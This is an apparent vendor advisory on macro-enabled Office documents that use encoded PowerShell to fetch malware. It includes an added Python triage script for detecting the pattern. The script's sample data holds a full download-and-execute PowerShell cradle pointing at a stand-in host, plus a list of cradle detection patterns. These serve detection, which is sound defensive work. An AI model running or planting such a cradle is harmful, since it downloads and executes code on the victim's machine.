Macro-enabled documents for downloading Malware

Updated: 21 Oct 2020
Summary

A macro is a set of commands that automates a task inside an application. Threat actors abuse this capability to build macro malware: Microsoft Office documents whose VBA (Visual Basic for Applications) macros are written to fetch and install other malware. These documents are usually delivered through phishing emails that lure the recipient into opening the attachment. When the document is opened, Office displays a security warning and the document body instructs the recipient to click "Enable Content". Once macros are enabled, the macro runs and the recipient's machine is infected.

Once enabled, the malicious macro typically launches PowerShell with a base64-encoded command that downloads a file into %UserProfile% or %Temp%. The downloaded file is executed shortly afterwards.
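The base64-encoded PowerShell stage described above is also where endpoint telemetry gives a defender a clean detection opportunity: the encoded argument can be decoded and inspected, and an Office application spawning PowerShell is itself a strong signal. The following Python is an added example, not code from this article or from Trend Micro. It decodes the -EncodedCommand argument from process-creation events and flags PowerShell launched by Word or Excel or carrying a download cradle. The three events, the URL and the file names are constructed for the example.

```python
import base64
import ntpath
import re
from typing import Dict, List, Optional

# Image names of Office applications that should not normally spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Download-cradle and staging indicators matching the behaviour described in the
# article (fetch a file into %UserProfile% or %Temp%, then run it).
CRADLE_PATTERNS = [
    r"Net\.WebClient", r"DownloadFile", r"DownloadString", r"Invoke-WebRequest",
    r"\biwr\b", r"Start-Process", r"\$env:TEMP", r"\$env:USERPROFILE", r"\$env:APPDATA",
]


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None.

    powershell.exe accepts -EncodedCommand, the aliases -e and -ec, and any
    unambiguous prefix (-enc, -enco, ...), so match prefixes rather than one spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        name = tok.lstrip("-/").lower()
        if not name or not (name in ("e", "ec") or "encodedcommand".startswith(name)):
            continue
        try:
            return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):   # not base64, or not UTF-16LE text
            return None
    return None


def triage_event(event: Dict[str, str]) -> Dict[str, object]:
    """Classify one process-creation event with keys parent, image and cmdline."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    result: Dict[str, object] = {
        "office_parent": parent in OFFICE_PARENTS, "decoded": None,
        "indicators": [], "verdict": "benign",
    }
    if image not in ("powershell.exe", "pwsh.exe"):
        return result
    decoded = decode_encoded_command(event["cmdline"])
    indicators = [p for p in CRADLE_PATTERNS if decoded and re.search(p, decoded, re.IGNORECASE)]
    result["decoded"] = decoded
    result["indicators"] = indicators
    if result["office_parent"]:
        result["verdict"] = "likely-malicious"   # Office -> PowerShell, as in the macro chain above
    elif indicators:
        result["verdict"] = "review"             # cradle-like code from a non-Office parent
    return result


# Constructed sample events (not real telemetry). The first mirrors the article's
# chain: Word spawns PowerShell, which drops a file in %TEMP% and runs it.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "$p=$env:TEMP+'\\inv.exe';"
         "(New-Object Net.WebClient).DownloadFile('http://example.invalid/inv.exe',$p);"
         "Start-Process $p")},
    {"parent": r"C:\Windows\System32\cmd.exe",   # benign admin one-liner from a console
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + encode_ps("Get-Service | Where-Object Status -eq 'Running'")},
    {"parent": r"C:\Windows\explorer.exe",       # unrelated process
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]


def triage_samples() -> List[Dict[str, object]]:
    """Run the triage over the constructed events."""
    return [triage_event(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for e, r in zip(SAMPLE_EVENTS, triage_samples()):
        print(ntpath.basename(e["parent"]), "->", r["verdict"], r["indicators"])
```

In a real deployment the events would come from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled; the parent-image check is the part that survives obfuscation of the script body, which is why it drives the verdict on its own.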

Infection Chain:

Behaviors:

  • Delivers other malware payloads
  • Uses macro
  • Steals computer data such as the computer name, system locale, operating system (OS) version and running processes

Impact:

  • Compromised system security, with backdoor capabilities that can execute malicious commands

Sample Spam (Invoice Attachment)

Sample Document - "Enable Content"

  • MS Word

  • MS Excel

Sample Macro

  • MS Word

  • MS Excel

MITRE ATT&CK Matrix

Behavior | Tactic | Technique
Malware arrives as an attachment | Initial Access | T1566.001 Phishing: Spearphishing Attachment
Victim is lured into opening the attachment | Execution | T1204.002 User Execution: Malicious File
Downloaded document has obfuscated macros to hide the URLs hosting the malware | Defense Evasion | T1027 Obfuscated Files or Information
Macro-enabled document downloads and executes the payload using a PowerShell command | Execution | T1059.005 Command and Scripting Interpreter: Visual Basic; T1059.001 Command and Scripting Interpreter: PowerShell
Details

Available Solutions:

Solution Module | Solution Available | Pattern Branch | Release Date | Detection/Policy/Rules
Email Protection | Yes | AS Pattern 5630 | August 28, 2020 | -
URL Protection | Yes | In the Cloud | - | -
Advanced Threat Scan Engine (ATSE) | Yes | 16.191.00 | August 28, 2020 | -
Predictive Learning (TrendX) | Yes | In the Cloud | - | Downloader.VBA.TRX.XXVBAF01FF009
File detection (VSAPI) | Yes | ENT OPR 16.191.00 | August 28, 2020 | see detection names below
Behavioral Monitoring (AEGIS) | Yes | TMTD OPR 2163 | August 27, 2020 | 4560T

File detection (VSAPI) names:

  • Trojan.W97M.EMOTET.TIOIBEKL
  • Trojan.W97M.EMOTET.TIOIBEKN
  • Trojan.W97M.ICEDID.AL
  • Trojan.W97M.POWLOAD.EMI
  • Trojan.W97M.POWLOAD.EMJ
  • Trojan.W97M.POWLOAD.TIOIBEMH
  • Trojan.W97M.POWLOAD.TIOIBEMN
  • Trojan.W97M.TRICKBOT.OD
  • Trojan.X97M.POWLOAD.USMANFOGEK
  • Trojan.X97M.POWLOAD.USNA

Additional Threat Information Reference:

Recommendations:

  • Keep the macro security settings in Microsoft Word and Excel enabled so that macros in downloaded documents do not run automatically when the document is opened.
  • Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to open a Word or Excel document, forward it to a member of the IT staff instead of clicking "Enable Content".
  • If you continually receive macro-bearing attachments from spam campaigns, use IMSVA's macro scanning.
Category: Remove a Malware / Virus
Solution Id: 000279049